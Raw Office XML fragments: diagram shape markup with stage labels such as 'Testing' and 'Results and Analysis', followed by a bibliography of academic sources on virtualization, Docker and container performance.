          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="45720"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="263159"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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1403043" y="1446150"/>
        <a:ext cx="14687" cy="2937"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{61F8A97A-8EFE-4791-93DC-265D8F69A7D7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3392" y="1064454"/>
          <a:ext cx="1277215" cy="7663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Implementation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3392" y="1064454"/>
        <a:ext cx="1277215" cy="766329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F204E721-35D3-4F49-989D-2662B05D6820}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2849782" y="1401899"/>
          <a:ext cx="263159" cy="91440"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="45720"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="263159"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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2974018" y="1446150"/>
        <a:ext cx="14687" cy="2937"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7A5C4424-5AE1-42B9-88C8-81D431694FE7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1574367" y="1064454"/>
          <a:ext cx="1277215" cy="7663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Testing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1574367" y="1064454"/>
        <a:ext cx="1277215" cy="766329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{85DF9015-9355-404F-BA69-DD803B5CAA0B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3145341" y="1064454"/>
          <a:ext cx="1277215" cy="7663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Results and Analysis</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3145341" y="1064454"/>
        <a:ext cx="1277215" cy="766329"/>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433706-CCF6-4478-B625-4BDD9B348D4E}">
  <we:reference id="f78a3046-9e99-4300-aa2b-5814002b01a2" version="1.28.0.0" store="EXCatalog" storeType="EXCatalog"/>
  <we:alternateReferences>
    <we:reference id="WA104382081" version="1.28.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RKu15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{28F88A96-96B1-4329-94EE-3859CC6E0A49}</b:Guid>
    <b:Title>An Importance of Using Virtualization Technology in Cloud Computing</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Kumar</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Charu</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Global Journal of Computers &amp; Technology</b:JournalName>
    <b:Pages>56-60</b:Pages>
    <b:Volume>1</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SMo19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{E9094572-6420-478E-9274-1F62AABFBAB9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mondesire</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Angelopoulou</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Sirigampola</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.al</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Combining Virtualization and Containerization to support interactive games and simulations on the cloud</b:Title>
    <b:JournalName>Simulation Modelling Practice and Theory</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>233-244</b:Pages>
    <b:Volume>93</b:Volume>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Đor21</b:Tag>
    <b:SourceType>ConferenceProceedings</b:SourceType>
    <b:Guid>{30223733-31D9-4F5F-82FE-292C7C4847CA}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Đorđević</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Timčenko</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Nikolić</b:Last>
            <b:First>E</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Davidović</b:Last>
            <b:First>N</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparing Performances of Native Host and Virtualization on ESXi hypervisor</b:Title>
    <b:Year>2021</b:Year>
    <b:ConferenceName>20th International Symposium INFOTEH-JAHORINA (INFOTEH)</b:ConferenceName>
    <b:City>East Sarajevo</b:City>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SRP17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{73C4FDB3-298C-413B-9AD2-158EEA4D86B6}</b:Guid>
    <b:Title>Performance Benchmarking of Hypervisors - A Case Study</b:Title>
    <b:Year>2017</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Poojara</b:Last>
            <b:First>S</b:First>
            <b:Middle>R.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Dharwadkar</b:Last>
            <b:First>N</b:First>
            <b:Middle>V.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Ghule</b:Last>
            <b:First>V</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Indian Journal of Science and Technology</b:JournalName>
    <b:Pages>1-11</b:Pages>
    <b:Volume>10</b:Volume>
    <b:Issue>44</b:Issue>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ABh21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{84AE415C-0D29-470D-99AF-A3D3E5798830}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bhardwaj</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Krishna</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Virtualization in Cloud Computing: Moving from Hypervisor to Containerization—A Survey</b:Title>
    <b:JournalName>Arabian Journal for science and Engineering</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>1-17</b:Pages>
    <b:Volume>2</b:Volume>
    <b:Issue>3</b:Issue>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>GRa19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{00482553-672A-46DF-93BE-3541F3383906}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Radchenko</b:Last>
            <b:First>G</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Alaasam</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Tchernykh</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparative Analysis of Virtualization Methods In Big Data Processing </b:Title>
    <b:JournalName>Supercomputing Frontiers and Innovations</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>48-79</b:Pages>
    <b:Volume>6</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DSa20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{9D993DFF-7BDF-487B-A6A7-005ABE550E67}</b:Guid>
    <b:Title>The Art of CPU-Pinning: Evaluating and Improving the Performance of Virtualization and Containerization Platforms</b:Title>
    <b:JournalName>arXiv preprint arXiv:2006.02055</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>1-11</b:Pages>
    <b:Volume>4</b:Volume>
    <b:Issue>2</b:Issue>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Samani</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Denninnart</b:Last>
            <b:First>C</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Bacik</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.al</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>OBe21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{75C4BF86-89B6-4F7C-9639-106727FB8D93}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bentaleb</b:Last>
            <b:First>O</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Belloum</b:Last>
            <b:First>A.S.Z</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Sebaa</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Containerization technologies: taxonomies, applications and challenges</b:Title>
    <b:JournalName>The Journal of Supercomputing</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>1-38</b:Pages>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MMo20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{3C06F39D-EC63-4C4D-9FC6-C38A77B8CD3A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Moravcik</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Segec</b:Last>
            <b:First>P</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Kontsek</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>el</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparison of LXC and Docker Technologies</b:Title>
    <b:JournalName>ICETA 2020 - 18th IEEE International Conference on Emerging eLearning Technologies and Applications, Proceedings</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>481-486</b:Pages>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ANJ15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{3C444353-85FF-48DF-AEC1-EA6EFCECD666}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Joy</b:Last>
            <b:First>A.N</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Performance comparison between Linux containers and virtual machines</b:Title>
    <b:JournalName>Conference Proceeding - 2015 International Conference on Advances in Computer Engineering and Applications, ICACEA 2015</b:JournalName>
    <b:Year>2015</b:Year>
    <b:Pages>342-346</b:Pages>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>QZh18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{3D854018-AA57-4D3E-BD98-C5D76C33DE1E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Zhang</b:Last>
            <b:First>Q</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Liu</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Pu</b:Last>
            <b:First>C</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>A Comparative Study of Containers and Virtual Machines in Big Data Environment</b:Title>
    <b:JournalName>IEEE International Conference on Cloud Computing, CLOUD</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>178-185</b:Pages>
    <b:Volume>2018-July</b:Volume>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>XXi17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{87C0D30C-9DD5-4931-9778-96109EAD058F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Xie</b:Last>
            <b:First>X</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Wang</b:Last>
            <b:First>P</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Wang</b:Last>
            <b:First>Q</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The performance analysis of Docker and rkt based on Kubernetes</b:Title>
    <b:JournalName>ICNC-FSKD 2017 - 13th International Conference on Natural Computation, Fuzzy Systems and Knowledge Discovery</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>2137-2141</b:Pages>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BRa17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{74A2B726-378F-4855-97F2-7C9C8B23578D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rad</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Bhatti</b:Last>
            <b:First>H.</b:First>
            <b:Middle>J</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Ahmadi</b:Last>
            <b:First>M</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>An Introduction to Docker and Analysis of its Performance</b:Title>
    <b:JournalName>ITCSNS International Journal of Computer Science and Network Security</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>228-235</b:Pages>
    <b:Volume>17</b:Volume>
    <b:Issue>3</b:Issue>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMP20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{65B7F023-A24B-4671-878A-05688A60C7FB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Potdar</b:Last>
            <b:First>A.</b:First>
            <b:Middle>M</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Kengond</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Mulla</b:Last>
            <b:First>M</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Perfromance evaluation of docker container and virtual machine</b:Title>
    <b:JournalName>Procedia Computer Science</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>1419-1428</b:Pages>
    <b:Volume>171</b:Volume>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C6F94609-5B0F-45A2-AC81-4A34F0CD1808}</b:Guid>
    <b:Title>Docker Overview</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://docs.docker.com/get-started/overview/</b:URL>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sit21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{61B02383-D8F8-4E30-B00D-8ECD8DF069A0}</b:Guid>
    <b:Title>Study of Container Technology with Docker</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sitaram</b:Last>
          </b:Person>
          <b:Person>
            <b:Last>Paktar</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>International Journal of Advanced Research in Science, Communication and Technology (IJARSCT)</b:JournalName>
    <b:Pages>504-509</b:Pages>
    <b:Volume>5</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>20</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ASH13</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{6059D442-F489-4043-882D-E8F9117665E4}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Harji</b:Last>
            <b:First>A.</b:First>
            <b:Middle>S</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Buhr</b:Last>
            <b:First>P</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Brecht</b:Last>
            <b:First>T</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Our troubles with Linux Kernel upgrades and why you should care</b:Title>
    <b:JournalName>ACM SIGOPS Operating system Review</b:JournalName>
    <b:Year>2013</b:Year>
    <b:Pages>66-72</b:Pages>
    <b:Volume>47</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>21</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>VTu15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{3C463D7A-B3DC-4E85-AA80-5CD419FE0872}</b:Guid>
    <b:Title>Advantages of docker</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Tuomas</b:Last>
            <b:First>V</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>VSh20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{FEEA2B80-8492-46BF-B65A-922F09F2F0C1}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sharma</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Saxena</b:Last>
            <b:First>H</b:First>
            <b:Middle>K.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Singh</b:Last>
            <b:First>A</b:First>
            <b:Middle>K.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker for Multi-containers web application </b:Title>
    <b:JournalName>2nd International Conference on Innovative Mechanisms for Industry Applications, ICIMIA 2020 - Conference Proceedings</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>589-592</b:Pages>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ONa20</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{1BC526AE-0548-41D3-8949-DDE452B17A5F}</b:Guid>
    <b:Title>5 Key Benefits of Docker: CI, Version Control, Portability, Isolation and Security</b:Title>
    <b:Year>2020</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nachmani</b:Last>
            <b:First>O</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>DZone</b:ProductionCompany>
    <b:Month>April</b:Month>
    <b:Day>19</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://dzone.com/articles/5-key-benefits-docker-ci</b:URL>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sin16</b:Tag>
    <b:SourceType>ConferenceProceedings</b:SourceType>
    <b:Guid>{99DA1856-4600-4AB1-B015-3B49EB649AE4}</b:Guid>
    <b:Title>Containers &amp; Docker: Emerging roles &amp; future of Cloud technology</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Singh</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Singh</b:Last>
            <b:First>N</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:ConferenceName>Proceedings of the 2016 2nd International Conference on Applied and Theoretical Computing and Communication Technology, iCATccT 2016</b:ConferenceName>
    <b:City>Bangalore</b:City>
    <b:RefOrder>22</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>FŠp15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{19060A67-FB56-4ED5-81C7-5A66AB16F741}</b:Guid>
    <b:Title>Docker as Platform for Assignments Evaluation</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Špaček</b:Last>
            <b:First>F</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Sohlich</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>T</b:Last>
            <b:First>Dulík</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Procedia Engineering</b:JournalName>
    <b:Pages>1665-1671</b:Pages>
    <b:Volume>100</b:Volume>
    <b:RefOrder>23</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc211</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0566A9A7-5C7C-40A5-BE3E-425B0549A5C8}</b:Guid>
    <b:Title>Docker overview | Docker Documentation</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://docs.docker.com/get-started/overview/</b:URL>
    <b:RefOrder>24</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DNü20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{82F1112A-2D1D-43CB-B337-4AEC00FF7EBF}</b:Guid>
    <b:Title>Ten simple rules for writing Dockerfiles for reproducible data science</b:Title>
    <b:Year>2020</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nüst</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Sochat</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Marwick</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.al</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>PLOS Computational Biology</b:JournalName>
    <b:Pages>e1008316</b:Pages>
    <b:Volume>16</b:Volume>
    <b:Issue>11</b:Issue>
    <b:RefOrder>25</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>CZh18</b:Tag>
    <b:SourceType>ConferenceProceedings</b:SourceType>
    <b:Guid>{50BB9A3D-A2AD-4953-B325-45CD0DCBFB27}</b:Guid>
    <b:Title>Wharf: Sharing Docker Images in a Distributed File System</b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Zheng</b:Last>
            <b:First>C</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Rupprecht</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Tarasov</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.al</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:ConferenceName>Proceeding of the ACM Symposium on Cloud Computing</b:ConferenceName>
    <b:City>Carlsbad</b:City>
    <b:RefOrder>26</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DSk19</b:Tag>
    <b:SourceType>ConferenceProceedings</b:SourceType>
    <b:Guid>{2320DC30-E5C7-4E27-B2ED-E6C8439F0576}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Skourtis</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Rupprecht</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Tarasov</b:Last>
            <b:First>V</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Carving perfect layers out of docker images</b:Title>
    <b:Year>2019</b:Year>
    <b:ConferenceName>HotCloud 19</b:ConferenceName>
    <b:RefOrder>27</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SBh18</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{A79BFB3C-FF7E-4486-A967-2F6D280B40C0}</b:Guid>
    <b:Title>Understanding the Dockerfile</b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bhat</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:BookTitle>Practical Docker with Python</b:BookTitle>
    <b:Pages>53-89</b:Pages>
    <b:Publisher>Springer</b:Publisher>
    <b:RefOrder>29</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc20</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{97058410-9F8A-4095-B043-4C4F27B41A37}</b:Guid>
    <b:Title>About storage drivers | Docker Documentation</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2020</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://docs.docker.com/storage/storagedriver/</b:URL>
    <b:RefOrder>28</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JSp19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{36A3E958-73CC-4B23-B8DB-C85EFE972736}</b:Guid>
    <b:Title>Enabling Docker for HPC</b:Title>
    <b:Year>2019</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sparks</b:Last>
            <b:First>J</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Concurrency and Computation: Practice and Experience</b:JournalName>
    <b:Pages>e5018</b:Pages>
    <b:Volume>31</b:Volume>
    <b:Issue>16</b:Issue>
    <b:RefOrder>30</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NKh19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{4994AED8-1778-4F4D-9E01-8259C088C308}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Khandhar</b:Last>
            <b:First>N</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Shah</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker-The Future of Virtualization</b:Title>
    <b:JournalName>International Journal of Research and Analytical Reviews</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>164-167</b:Pages>
    <b:Volume>6</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>31</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mud19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B9F18C64-5E95-4EBA-A136-0A4573E580FC}</b:Guid>
    <b:Title>Self-Hosted Kubernetes: Deploying Docker Containers Locally with Minikube</b:Title>
    <b:JournalName>Proceeding - 1st International Conference on Innovative Trends and Advances in Engineering and Technology, ICITAET 2019</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>239-243</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Muddinagiri</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ambavane</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Bayas</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
